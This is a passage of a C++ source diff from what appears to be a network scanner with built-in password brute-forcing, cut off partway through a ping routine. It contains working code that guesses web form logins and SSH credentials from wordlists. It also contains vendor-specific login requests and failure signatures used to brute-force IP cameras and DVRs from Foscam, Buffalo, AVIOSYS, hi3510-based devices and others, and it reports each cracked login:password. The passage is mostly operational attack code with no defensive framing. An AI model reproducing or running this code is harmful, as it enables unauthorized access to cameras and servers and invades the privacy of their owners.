+ stt->doEmitionRedFoundData("" + QString(ip) + ":" + QString::number(port) + " - [WF]: 404 Not Found.");
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+ if(strstri(CSTR.lowerBuff, "Access is Denied") == NULL
+ && strstri(CSTR.lowerBuff, "Location:") == NULL
+ && strstri(CSTR.lowerBuff, "Access forbidden") == NULL
+ && strstri(CSTR.lowerBuff, "Authentication required") == NULL
+ && strstri(CSTR.lowerBuff, "invalid") == NULL
+ && strstri(CSTR.lowerBuff, "error") == NULL
+ && strstri(CSTR.lowerBuff, "loginerr") == NULL
+ && strstri(CSTR.lowerBuff, "passerr") == NULL
+ && strstri(CSTR.lowerBuff, "passworderr") == NULL
+ && strstri(CSTR.lowerBuff, "location.href") == NULL
+ && strstri(CSTR.lowerBuff, "location.replace") == NULL
+ && strstri(CSTR.lowerBuff, "top.location") == NULL
+ && strstri(CSTR.lowerBuff, "error_status") == NULL
+ && strstri(CSTR.lowerBuff, "http-equiv=\"refresh\"") == NULL
+ && strstri(CSTR.lowerBuff, "http-equiv = \"refresh\"") == NULL
+ && strstri(CSTR.lowerBuff, "busy") == NULL
+ && strstri(CSTR.lowerBuff, "later") == NULL
+ && strstri(CSTR.lowerBuff, "verification failed") == NULL
+ && strstri(CSTR.lowerBuff, "403 Forbidden") == NULL
+ && strstri(CSTR.lowerBuff, formVal) == NULL
+ )
+ {
+ if(i == 0)
+ {
+ ZeroMemory(request, sizeof(request));
+ ZeroMemory(argData, sizeof(argData));
+
+ isActive = 0;
+
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+ char pass[256] = {0};
+
+ ZeroMemory(pass, sizeof(pass));
+ strcpy(pass, ip);
+ strcat(pass, " - Web Form password found: ");
+ strcat(pass, wfLoginLst[i]);
+ strcat(pass, ":");
+ strcat(pass, wfPassLst[j]);
+ isActive = 0;
+
+ stt->doEmition_BAGreenData("[+] " + QString(pass));
+
+ strcpy(lps.login, wfLoginLst[i]);
+ strcpy(lps.pass, wfPassLst[j]);
+ return lps;
+ };
+ }
+ else
+ {
+ ZeroMemory(request, sizeof(request));
+ ZeroMemory(argData, sizeof(argData));
+
+ isActive = 0;
+
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+ if(i == 0) ++i;
+ ZeroMemory(request, sizeof(request));
+ ZeroMemory(argData, sizeof(argData));
+ };
+ firstCycle = 1;
+ };
+ }
+ else
+ {
+ stt->doEmitionFoundData("" + QString(ip) + ":" + QString::number(port) + " - [WF]: Unknown method.");
+ };
+
+ ZeroMemory(request, sizeof(request));
+ ZeroMemory(argData, sizeof(argData));
+
+ isActive = 0;
+
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+};
+lopaStr Connector::_WFLobby(char *cookie, char *ip, int port, char *methodVal, char *actionVal, char *userVal, char *passVal, char *formVal)
+{
+ while(BrutingThrds >= gMaxBrutingThreads) Sleep(700);
+
+ ++WF;
+
+ BConInc();
+ lopaStr res = _WFBrut(cookie, ip, port, methodVal, actionVal, userVal, passVal, formVal);
+ BConDec();
+
+ return res;
+};
+
+#pragma region SSH
+int _sshConnect(char *user, char *pass, char *host, int port)
+{
+ char hostStr[128] = {0};
+ ZeroMemory(hostStr, sizeof(hostStr));
+ strcpy(hostStr, user);
+ strcat(hostStr, "@");
+ strcat(hostStr, host);
+
+ ssh_session my_ssh_session = ssh_new();
+ if (my_ssh_session == NULL)
+ {
+ ssh_free(my_ssh_session);
+ return -1;
+ };
+
+ ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, hostStr);
+ ssh_options_set(my_ssh_session, SSH_OPTIONS_PORT, &port);
+ //ssh_options_set(my_ssh_session, SSH_OPTIONS_LOG_VERBOSITY, &verbosity);
+ //ssh_options_set(my_ssh_session, SSH_OPTIONS_LOG_VERBOSITY_STR, &verbosity);
+ //ssh_options_set(my_ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
+ int sshTimeout = gTimeOut + 1;
+ ssh_options_set(my_ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout);
+
+ int rc = ssh_connect(my_ssh_session);
+
+ if (rc != SSH_OK)
+ {
+ ssh_disconnect(my_ssh_session);
+ ssh_free(my_ssh_session);
+ ++offlines;
+ return -2;
+ }
+ else
+ {
+ rc = ssh_userauth_password(my_ssh_session, NULL, pass);
+ if (rc != SSH_AUTH_SUCCESS)
+ {
+ ssh_disconnect(my_ssh_session);
+ ssh_free(my_ssh_session);
+ return -1;
+ };
+ };
+ ssh_disconnect(my_ssh_session);
+ ssh_free(my_ssh_session);
+ ++ssh;
+ return 0;
+};
+char *_get_ssh_banner(char *ip, int port)
+{
+ Connector con;
+ conSTR CSTR;
+ char recvBuff[256] = {0};
+ con._EstablishConnection(ip, port, "", &CSTR);
+ if(CSTR.lowerBuff != NULL && CSTR.size != 0)
+ {
+ strncpy(recvBuff, CSTR.lowerBuff, CSTR.size < 256 ? CSTR.size : 256);
+ };
+ if(CSTR.lowerBuff != NULL)
+ {
+ delete []CSTR.lowerBuff;
+ CSTR.lowerBuff = NULL;
+ };
+ return recvBuff;
+};
+int check_ssh_pass(char *user, char *pass, char *userPass, char *host, int port, conSTR *CSTR, char *banner)
+{
+ int res = -1;
+ if(BALogSwitched) stt->doEmitionBAData("Probing SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host) + ":" + QString::number(port));
+ res = _sshConnect(user, pass, host, port);
+ if(res == 0)
+ {
+ stt->doEmition_BAGreenData("[+] SSH: " + QString(user) + ":" + QString(pass) + "@" + QString(host));
+ char goodStr[512] = {0};
+ strcpy(goodStr, userPass);
+ strcat(goodStr, "@");
+ strcat(goodStr, host);
+ strcat(goodStr, "|+|");
+ strcat(goodStr, banner);
+ int bsz = strlen(goodStr);
+ CSTR->lowerBuff = new char[bsz + 1];
+ ZeroMemory(CSTR->lowerBuff, sizeof(CSTR->lowerBuff));
+ CSTR->size = bsz;
+ strncpy(CSTR->lowerBuff, goodStr, bsz);
+ memset(CSTR->lowerBuff + bsz, '\0', 1);
+ return 0;
+ };
+ return res;
+};
+int _EstablishSSHConnection(char *host, int port, conSTR *CSTR, char *banner)
+{
+ CSTR->lowerBuff = NULL;
+ CSTR->size = 0;
+ char login[32] = {0};
+ char pass[32] = {0};
+ char temp[64] = {0};
+ isActive = 1;
+ BConInc();
+ int sz = 0;
+ char *ptr1 = 0;
+ int res = -1;
+ for(int i = 0; i < MaxSSHPass; ++i)
+ {
+ if(globalScanFlag == false) break;
+ strcpy(temp, sshlpLst[i]);
+ ptr1 = strstr(temp, ":");
+ sz = ptr1 - temp;
+ strncpy(login, temp, sz);
+ strcpy(pass, ptr1 + 1);
+ res = check_ssh_pass(login, pass, temp, host, port, CSTR, banner);
+ ZeroMemory(login, sizeof(login));
+ ZeroMemory(pass, sizeof(pass));
+ ZeroMemory(temp, sizeof(temp));
+ if(res == 0)
+ {
+ if(i == 0) return -2; //Failhit
+ BConDec();
+ isActive = 0;
+ return 0;
+ }
+ else if(res == -2)
+ {
+ BConDec();
+ isActive = 0;
+ return -2;
+ };
+ Sleep(500);
+ };
+ BConDec();
+ isActive = 0;
+ return -1;
+};
+
+#pragma region IPCAMWeb
+int _webLoginSeq(char *request, char *login, char *pass, char *ip, int port, int passCounter, char *type, std::vector negVector)
+{
+ char recvBuff[256] = {0};
+ char recvBuff2[4096] = {0};
+
+ SOCKET sock;
+ sockaddr_in sockAddr;
+ int bTO;
+ sockAddr.sin_family = AF_INET;
+ sockAddr.sin_port = htons(port);
+ HOSTENT *host;
+#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
+ if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip);
+ else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
+ else
+ {
+ return -1;
+ };
+#else
+ if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip);
+ else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
+ else
+ {
+ return -1;
+ };
+#endif
+ sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ int cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
+ int cErrCode = WSAGetLastError();
+
+ while(cErrCode == 10038)
+ {
+ CSSOCKET(sock);
+ sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
+ cErrCode = WSAGetLastError();
+ if(gDebugMode) stt->doEmitionDebugFoundData("[" + QString(type) + "] 10038 occured -- [" + QString(ip) + ":" + QString::number(port) + "]");
+ };
+
+ if(cCode != SOCKET_ERROR)
+ {
+ int x = 1;
+ Activity += strlen(request);
+
+ if(send(sock, request, strlen(request), 0) == SOCKET_ERROR)
+ {
+ stt->doEmitionRedFoundData("[" + QString(type) + "] Send error! [" + QString(ip) + "]");
+ CSSOCKET(sock);
+ return 0;
+ }
+ else
+ {
+ if(MapWidgetOpened) stt->doEmitionAddOutData(QString(ip), QString(request));
+ int x = 1;
+ int xx = 0;
+ ZeroMemory(recvBuff2, sizeof(recvBuff2));
+ while(xx < 3072)
+ {
+ ZeroMemory(recvBuff, sizeof(recvBuff));
+ x = recvWT(sock, recvBuff, sizeof(recvBuff), gTimeOut + 2, &bTO);
+ if(x <= 0) break;
+ strncat(recvBuff2, recvBuff, x);
+ xx += x;
+ Activity += x;
+ };
+
+ if(BALogSwitched) stt->doEmitionBAData("Checked " + QString(type) + ": " + QString(ip) + ":" + QString::number(port) + "; login/pass: "+ QString(login) + ":" + QString(pass) + "; - Progress: (" + QString::number((passCounter/(double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
+
+ if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff2));
+
+ if(strlen(recvBuff2) > 0) {
+ bool result = true;
+ for(int i = 0; i < negVector.size(); ++i)
+ {
+ if(strstri(recvBuff2, negVector[i]) != NULL)
+ {
+ result = false;
+ break;
+ };
+ };
+
+ if(result)
+ {
+ CSSOCKET(sock);
+ return 1;
+ };
+ }
+ };
+ };
+
+ CSSOCKET(sock);
+ return 0;
+};
+lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
+{
+ lopaStr lps;
+ ZeroMemory(lps.login, sizeof(lps.login));
+ ZeroMemory(lps.pass, sizeof(lps.pass));
+ ZeroMemory(lps.other, sizeof(lps.other));
+ char login[128] = {0};
+ char pass[128] = {0};
+ char request[1024] = {0};
+ isActive = 1;
+ int passCounter = 1;
+
+ std::vector negVector;
+ if(strcmp(SPEC, "IPC") == 0)
+ {
+ negVector.push_back("Invalid");
+ }
+ else if(strcmp(SPEC, "GEO") == 0)
+ {
+ negVector.push_back("Access denied");
+ negVector.push_back("ErrNoSuchUsr.htm");
+ }
+ else if(strcmp(SPEC, "EasyCam") == 0)
+ {
+ negVector.push_back("Set-Cookie: usrLevel=-1;path=/");
+ }
+ else if(strcmp(SPEC, "Foscam") == 0)
+ {
+ negVector.push_back("0");
+ negVector.push_back("-1");
+ negVector.push_back("-2");
+ negVector.push_back("-3");
+ negVector.push_back("-4");
+ negVector.push_back("-5");
+ negVector.push_back("-6");
+ negVector.push_back("-7");
+ }
+ else if(strcmp(SPEC, "AVIOSYS") == 0)
+ {
+ negVector.push_back("Password Error");
+ }
+ else if(strcmp(SPEC, "BUFFALO") == 0)
+ {
+ negVector.push_back("403 Forbidden");
+ }
+ else if(strcmp(SPEC, "DVS") == 0)
+ {
+ negVector.push_back("Non-Existed");
+ }
+ else if(strcmp(SPEC, "IPCAM") == 0)
+ {
+ negVector.push_back("var check=\"0\"");
+ negVector.push_back("var authLevel =\"0\";");
+ }
+ else if(strcmp(SPEC, "IEORFOREFOX") == 0)
+ {
+ negVector.push_back("AAA()");
+ negVector.push_back("РРјСЏ или пароль неверные!");
+ negVector.push_back("Возврат");
+ negVector.push_back("HTTP/1.0 302 Found");
+ }
+ else
+ {
+ stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+
+ for(int i = 0; i < MaxLogin; i++)
+ {
+ if(globalScanFlag == false) break;
+ if(strcmp(loginLst[i], " ") == 0) continue;
+ ZeroMemory(login, sizeof(login));
+ strcpy(login, loginLst[i]);
+ for(int j = 0; j < MaxPass; j++)
+ {
+ if(globalScanFlag == false) break;
+ if(strcmp(passLst[j], " ") == 0) continue;
+
+ ZeroMemory(pass, sizeof(pass));
+ strcpy(pass, passLst[j]);
+
+ ZeroMemory(request, sizeof(request));
+ if(strcmp(SPEC, "IPC") == 0)
+ {
+ strcpy(request, "GET /login.xml?user=");
+ strcat(request, login);
+ strcat(request, "&usr=");
+ strcat(request, login);
+ strcat(request, "&password=");
+ strcat(request, pass);
+ strcat(request, "&pwd=");
+ strcat(request, pass);
+ strcat(request, " HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
+ }
+ else if(strcmp(SPEC, "GEO") == 0)
+ {
+ strcpy(request, "GET /Login.cgi?username=");
+ strcat(request, login);
+ strcat(request, "&password=");
+ strcat(request, pass);
+ strcat(request, " HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
+ }
+ else if(strcmp(SPEC, "EasyCam") == 0)
+ {
+ strcpy(request, "GET /login.xml?user=");
+ strcat(request, login);
+ strcat(request, "&usr=");
+ strcat(request, login);
+ strcat(request, "&password=");
+ strcat(request, pass);
+ strcat(request, "&pwd=");
+ strcat(request, pass);
+ strcat(request, " HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
+ }
+ else if(strcmp(SPEC, "Foscam") == 0)
+ {
+ strcpy(request, "GET /cgi-bin/CGIProxy.fcgi?usr=");
+ strcat(request, login);
+ strcat(request, "&pwd=");
+ strcat(request, pass);
+ strcat(request, "&cmd=logIn&usrName=");
+ strcat(request, login);
+ strcat(request, "&pwd=");
+ strcat(request, pass);
+ strcat(request, " HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
+ }
+ else if(strcmp(SPEC, "AVIOSYS") == 0)
+ {
+ strcpy(request, "GET /check_user.html?UserName=");
+ strcat(request, login);
+ strcat(request, "&PassWord=");
+ strcat(request, pass);
+ strcat(request, " HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
+ }
+ else if(strcmp(SPEC, "BUFFALO") == 0)
+ {
+ strcpy(request, "POST /rpc/login HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
+ int loginLength = strlen(login);
+ int passLength = strlen(pass);
+ int sz = loginLength + passLength + strlen("user=&password=");
+ char *passString = new char[sz + 1];
+ ZeroMemory(passString, sizeof(passString));
+ strcpy(passString, "user=");
+ strcat(passString, login);
+ strcat(passString, "&password=");
+ strcat(passString, pass);
+ strcat(request, "\r\nContent-Length: ");
+ char tempBuff[16] = {0};
+ sprintf(tempBuff, "%d", sz);
+ strcat(request, tempBuff);
+ strcat(request, "\r\n\r\n");
+ strcat(request, passString);
+ delete []passString;
+ }
+ else if(strcmp(SPEC, "DVS") == 0)
+ {
+ strcpy(request, "POST /login HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
+ int loginLength = strlen(login);
+ int passLength = strlen(pass);
+ int sz = loginLength + passLength + strlen("langs=en&user=&password=&submit=+Login+");
+ char *passString = new char[sz + 1];
+ ZeroMemory(passString, sizeof(passString));
+ strcpy(passString, "langs=en&user=");
+ strcat(passString, login);
+ strcat(passString, "&password=");
+ strcat(passString, pass);
+ strcat(passString, "&submit=+Login+");
+ strcat(request, "\r\nContent-Length: ");
+ char tempBuff[16] = {0};
+ sprintf(tempBuff, "%d", sz);
+ strcat(request, tempBuff);
+ strcat(request, "\r\n\r\n");
+ strcat(request, passString);
+ delete []passString;
+ }
+ else if(strcmp(SPEC, "IPCAM") == 0)
+ {
+ strcpy(request, "GET /cgi-bin/hi3510/checkuser.cgi?&-name=");
+ strcat(request, login);
+ strcat(request, "&-passwd=");
+ strcat(request, pass);
+ strcat(request, "&-time=1416767330831 HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
+
+ }
+ else if(strcmp(SPEC, "IEORFOREFOX") == 0)
+ {
+ strcpy(request, "POST /logincheck.rsp?type=1 HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
+ int loginLength = strlen(login);
+ int passLength = strlen(pass);
+ int sz = loginLength + passLength + strlen("username=&userpwd=");
+ char *passString = new char[sz + 1];
+ ZeroMemory(passString, sizeof(passString));
+ strcpy(passString, "username=");
+ strcat(passString, login);
+ strcat(passString, "&userpwd=");
+ strcat(passString, pass);
+ strcat(request, "\r\nContent-Length: ");
+ char tempBuff[16] = {0};
+ sprintf(tempBuff, "%d", sz);
+ strcat(request, tempBuff);
+ strcat(request, "\r\n\r\n");
+ strcat(request, passString);
+ delete []passString;
+ };
+
+ int res = _webLoginSeq(request, login, pass, ip, port, passCounter, SPEC, negVector);
+
+ if(res == 1)
+ {
+ isActive = 0;
+ strcpy(lps.login, loginLst[i]);
+ strcpy(lps.pass, passLst[j]);
+ return lps;
+ }
+ else if(res == -1)
+ {
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+ ++passCounter;
+ };
+ };
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+};
+lopaStr Connector::_IPCameraBLobby(char *ip, int port, char *SPEC)
+{
+ while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
+
+ BConInc();
+ lopaStr res = _IPCameraBrute(ip, port, SPEC);
+ BConDec();
+
+ return res;
+}
+
+#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
+int _pingMyTarget(char *ip)
+{
+ HANDLE hIcmpFile;
+ unsigned long ipaddr = INADDR_NONE;
+ DWORD dwRetVal = 0;
+ char SendData[32] = "Data Buffer";
+ LPVOID ReplyBuffer = NULL;
+ DWORD ReplySize = 0;
+
+ ipaddr = inet_addr(ip);
+
+ if (ipaddr == INADDR_NONE)
+ {
+ stt->doEmitionRedFoundData("[Pinger] INADDR_NONE! [" + QString(ip) + "]");
+ return 0;
+ }
+
+ hIcmpFile = IcmpCreateFile();
+ if (hIcmpFile == INVALID_HANDLE_VALUE)
+ {
+ stt->doEmitionRedFoundData("[Pinger] Unable to open handle. [" + QString::number(GetLastError()) + "]");
+ return 0;
+ }
+
+ ReplySize = sizeof(ICMP_ECHO_REPLY) + sizeof(SendData);
+ ReplyBuffer = (VOID*) malloc(ReplySize);
+ if (ReplyBuffer == NULL)
+ {
+ stt->doEmitionRedFoundData("[Pinger] Unable to allocate memory.");
+ return 0;
+ }
+
+
+ dwRetVal = IcmpSendEcho(hIcmpFile, ipaddr, SendData, sizeof(SendData),
+ NULL, ReplyBuffer, ReplySize, gPingTimeout);
+ if (dwRetVal != 0) {
+ PICMP_ECHO_REPLY pEchoReply = (PICMP_ECHO_REPLY)ReplyBuffer;
+ struct in_addr ReplyAddr;
+ ReplyAddr.S_un.S_addr = pEchoReply->Address;
+ printf("\tSent icmp message to %s\n", "127.0.0.1");
+ if (dwRetVal > 1)
+ {
+ if(gDebugMode) stt->doEmitionYellowFoundData("[Pinger] Received " + QString::number(dwRetVal) + " icmp message responses.");
+ }
+ else
+ {
+ if(gDebugMode) stt->doEmitionYellowFoundData("[Pinger] Received " + QString::number(dwRetVal) + " icmp message responses.");
+ }
+
+ if(gDebugMode) stt->doEmitionYellowFoundData("[Pinger] Received from: " + QString(inet_ntoa( ReplyAddr )) + "; Status = " + QString::number(pEchoReply->Status) + "; Roundtrip time = " + QString::number(pEchoReply->RoundTripTime) + "ms.");
+ return 1;
+ }
+ else
+ {
+ printf("\tCall to IcmpSendEcho failed.\n");
+ printf("\tIcmpSendEcho returned error: %ld\n", GetLastError() );
+ if(gDebugMode) stt->doEmitionRedFoundData("[Pinger] Call to IcmpSendEcho failed. IcmpSendEcho returned error: " + QString::number(GetLastError()));
+ return 0;
+ };
+};
+#else
+
+#define DEFDATALEN (64-ICMP_MINLEN) /* default data length */
+#define MAXIPLEN 60
+#define MAXICMPLEN 76
+#define MAXPACKET (65536 - 60 - ICMP_MINLEN)/* max packet size */
+
+int _pingMyTarget(char* target)
+{
+ int s, i, cc, packlen, datalen = DEFDATALEN;
+ struct hostent *hp;
+ struct sockaddr_in to, from;
+ struct ip *ip;
+ u_char *packet, outpack[MAXPACKET];
+ char hnamebuf[MAXHOSTNAMELEN];
+ string hostname;
+ struct icmp *icp;
+ int ret, fromlen, hlen;
+ fd_set rfds;
+ struct timeval tv;
+ int retval;
+ struct timeval start, end;
+ int end_t;
+ bool cont = true;
+
+ to.sin_family = AF_INET;
+
+ // try to convert as dotted decimal address, else if that fails assume it's a hostname
+ to.sin_addr.s_addr = inet_addr(target);
+ if (to.sin_addr.s_addr != (u_int)-1)
+ hostname = string(target);
+ else
+ {
+ hp = gethostbyname(target);
+ if (!hp)
+ {
+ cerr << "unknown host "<< target << endl;
+ return -1;
+ }
+ to.sin_family = hp->h_addrtype;
+ bcopy(hp->h_addr, (caddr_t)&to.sin_addr, hp->h_length);
+ strncpy(hnamebuf, hp->h_name, sizeof(hnamebuf) - 1);
+ hostname = hnamebuf;
+ }
+ packlen = datalen + MAXIPLEN + MAXICMPLEN;
+ if ( (packet = (u_char *)malloc((u_int)packlen)) == NULL)
+ {
+ cerr << "malloc error\n";
+ return -1;
+ }
+
+ if ( (s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0)
+ {
+ perror("socket"); /* probably not running as superuser */
+ return -1;
+ }
+
+ icp = (struct icmp *)outpack;
+ icp->icmp_type = ICMP_ECHO;
+ icp->icmp_code = 0;
+ icp->icmp_cksum = 0;
+ icp->icmp_seq = 12345; /* seq and id must be reflected */
+ icp->icmp_id = getpid();
+
+
+ cc = datalen + ICMP_MINLEN;
+ icp->icmp_cksum = in_cksum((unsigned short *)icp,cc);
+
+ gettimeofday(&start, NULL);
+
+ i = sendto(s, (char *)outpack, cc, 0, (struct sockaddr*)&to, (socklen_t)sizeof(struct sockaddr_in));
+ if (i < 0 || i != cc)
+ {
+ if (i < 0)
+ perror("sendto error");
+ cout << "wrote " << hostname << " " << cc << " chars, ret= " << i << endl;
+ }
+
+ // Watch stdin (fd 0) to see when it has input.
+ FD_ZERO(&rfds);
+ FD_SET(s, &rfds);
+ // Wait up to one seconds.
+ tv.tv_sec = 1;
+ tv.tv_usec = 0;
+
+ while(cont)
+ {
+ retval = select(s+1, &rfds, NULL, NULL, &tv);
+ if (retval == -1)
+ {
+ perror("select()");
+ return -1;
+ }
+ else if (retval)
+ {
+ fromlen = sizeof(sockaddr_in);
+ if ( (ret = recvfrom(s, (char *)packet, packlen, 0,(struct sockaddr *)&from, (socklen_t*)&fromlen)) < 0)
+ {
+ perror("recvfrom error");
+ return -1;
+ }
+
+ // Check the IP header
+ ip = (struct ip *)((char*)packet);
+ hlen = sizeof( struct ip );
+ if (ret < (hlen + ICMP_MINLEN))
+ {
+ cerr << "packet too short (" << ret << " bytes) from " << hostname << endl;;
+ return -1;
+ }
+
+ // Now the ICMP part
+ icp = (struct icmp *)(packet + hlen);
+ if (icp->icmp_type == ICMP_ECHOREPLY)
+ {
+ cout << "Recv: echo reply"<< endl;
+ if (icp->icmp_seq != 12345)
+ {
+ cout << "received sequence # " << icp->icmp_seq << endl;
+ continue;
+ }
+ if (icp->icmp_id != getpid())
+ {
+ cout << "received id " << icp->icmp_id << endl;
